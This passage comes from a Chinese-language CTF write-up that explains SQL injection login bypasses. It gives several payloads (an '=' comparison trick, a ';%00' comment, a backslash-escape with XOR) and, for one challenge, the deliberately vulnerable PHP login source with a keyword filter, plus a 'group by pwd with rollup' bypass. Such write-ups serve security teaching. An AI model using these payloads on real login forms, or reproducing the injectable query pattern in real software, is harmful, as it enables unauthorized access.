<li>username=’=’&amp;password=’=’ ,sql语句为<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select user from flag where user=&apos;&apos;=&apos;&apos; and password=&apos;&apos;=&apos;&apos;</span><br></pre></td></tr></table></figure>

</li>
</ol>
<p>user=”返回的是NULL,值为0，NULL=”,成立，即为</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select user from flag where 1 and 1</span><br></pre></td></tr></table></figure>

<ol start="3">
<li><p>username=a’+0;%00&amp;password=</p>
<ul>
<li>mysql的注释符除了 – + ， # ，/**/ 之外，还有一个 ;%00</li>
<li>user是一个字符串类型的，当他接受到一个整型值切值为0的时候，就会返回数据库的所有条目</li>
</ul>
</li>
<li><p>username=&amp;password=^’a</p>
<ul>
<li><p>并没有过滤转义符号：,可以在username处输入转义符号，转义后面的单引号</p>
</li>
<li><p>查询语句会变成</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select * from table where  username=&apos;\&apos; and password=&apos;^&apos;a&apos;</span><br></pre></td></tr></table></figure>
</li>
<li><p>此时username值为（’ and password=）</p>
</li>
<li><p>然后后面又是一个位异或运算，异或username的值与字符串’a’，这里根据sql运算顺序，会先进行异或运算，而”’and password=”与”a”异或的结果是0</p>
</li>
<li><p>查询语句会查询所有username=0的数据，而username都是字符串，正常情况下都是0所以会显示出所有的数据</p>
</li>
</ul>
</li>
</ol>
<h2 id="因缺思汀的绕过"><a href="#因缺思汀的绕过" class="headerlink" title="因缺思汀的绕过"></a>因缺思汀的绕过</h2><ul>
<li><p>查看源码发现suource.txt，打开得到源码</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">error_reporting(0);</span><br><span class="line"></span><br><span class="line">if (!isset($_POST[&apos;uname&apos;]) || !isset($_POST[&apos;pwd&apos;])) &#123;</span><br><span class="line">  echo &apos;&lt;form action=&quot;&quot; method=&quot;post&quot;&gt;&apos;.&quot;&lt;br/&gt;&quot;;</span><br><span class="line">  echo &apos;&lt;input name=&quot;uname&quot; type=&quot;text&quot;/&gt;&apos;.&quot;&lt;br/&gt;&quot;;</span><br><span class="line">  echo &apos;&lt;input name=&quot;pwd&quot; type=&quot;text&quot;/&gt;&apos;.&quot;&lt;br/&gt;&quot;;</span><br><span class="line">  echo &apos;&lt;input type=&quot;submit&quot; /&gt;&apos;.&quot;&lt;br/&gt;&quot;;</span><br><span class="line">  echo &apos;&lt;/form&gt;&apos;.&quot;&lt;br/&gt;&quot;;</span><br><span class="line">  echo &apos;&lt;!--source: source.txt--&gt;&apos;.&quot;&lt;br/&gt;&quot;;</span><br><span class="line">    die;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">function AttackFilter($StrKey,$StrValue,$ArrReq)&#123;</span><br><span class="line">    if (is_array($StrValue))&#123;</span><br><span class="line">        $StrValue=implode($StrValue);</span><br><span class="line">    &#125;</span><br><span class="line">    if (preg_match(&quot;/&quot;.$ArrReq.&quot;/is&quot;,$StrValue)==1)&#123;</span><br><span class="line">        print &quot;水可载舟，亦可赛艇！&quot;;</span><br><span class="line">        exit();</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">$filter = &quot;and|select|from|where|union|join|sleep|benchmark|,|\(|\)&quot;;</span><br><span class="line">foreach($_POST as $key=&gt;$value)&#123;</span><br><span class="line">    AttackFilter($key,$value,$filter);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">$con = mysql_connect(&quot;XXXXXX&quot;,&quot;XXXXXX&quot;,&quot;XXXXXX&quot;);</span><br><span class="line">if (!$con)&#123;</span><br><span class="line">  die(&apos;Could not connect: &apos; . mysql_error());</span><br><span class="line">&#125;</span><br><span class="line">$db=&quot;XXXXXX&quot;;</span><br><span class="line">mysql_select_db($db, $con);</span><br><span class="line">$sql=&quot;SELECT * FROM interest WHERE uname = &apos;&#123;$_POST[&apos;uname&apos;]&#125;&apos;&quot;;</span><br><span class="line">$query = mysql_query($sql);</span><br><span class="line">if (mysql_num_rows($query) == 1) &#123;</span><br><span class="line">    $key = mysql_fetch_array($query);</span><br><span class="line">    if($key[&apos;pwd&apos;] == $_POST[&apos;pwd&apos;]) &#123;</span><br><span class="line">        print &quot;CTF&#123;XXXXXX&#125;&quot;;</span><br><span class="line">    &#125;else&#123;</span><br><span class="line">        print &quot;亦可赛艇！&quot;;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;else&#123;</span><br><span class="line">  print &quot;一颗赛艇！&quot;;</span><br><span class="line">&#125;</span><br><span class="line">mysql_close($con);</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>
</li>
<li><p>$sql=”SELECT * FROM interest WHERE uname = ‘{$_POST[‘uname’]}’”;</p>
</li>
<li><p>过滤了<code>&quot;and|select|from|where|union|join|sleep|benchmark|,|\(|\)&quot;</code></p>
</li>
<li><p>输入的用户名为：’ or 1=1 group by pwd with rollup limit 1 offset 2 #</p>
</li>
<li><p>这里解释一下此时执行的SQL:</p>
</li>
<li><p>SELECT * FROM interest where uname=’ ‘ or 1=1</p>
</li>
<li><p>group by pwd with rollup  （在数据库中添加一行使得pwd=NULL）(with rollup会在查询的结果后面加上一个为空的列)</p>
</li>
<li><p>limit 1 （只查询一行）</p>
</li>
<li><p>offset 2  （从第二行开始查询）</p>
</li>
<li><p>#注释</p>
</li>
<li><p>此时密码只要为空即可查询成功</p>
</li>
</ul>

  </article>
</div>


    




</div>

<div class="footer-wrapper container">
  <footer class="footer clearfix">
    <div class="clearfix">
    <a href="https://daolgts.github.io" class="footer-logo">
      <i class="fa fa-github"></i>
    </a>
    <ul class="footer-social-link">
      <li>© 2019 daolgts</li>
      <li><a href="https://daolgts.github.io">Home</a></li>
      
      <li><a href="https://github.com/daolgts">Github</a></li>
      
    </ul>
    <div class="footer-theme-info">
      Theme <a href="//github.com/sabrinaluo/hexo-theme-replica">Replica</a>
      by <a href="//github.com/sabrinaluo">Hiitea</a> ❤ Powered by Hexo
    </div>
    </div>
    
  </footer>
</div>


<script>
  (function() {
    var cx = '005157513716557594323:jvii0oiejlb';
    var gcse = document.createElement('script');
    gcse.type = 'text/javascript';
    gcse.async = true;
    gcse.src = (document.location.protocol == 'https:' ? 'https:' : 'http:') +
      '//cse.google.com/cse.js?cx=' + cx;
    var s = document.getElementsByTagName('script')[0];
    s.parentNode.insertBefore(gcse, s);
  })();
</script>



<script src="/js/main.js"></script>

</body>
</html>
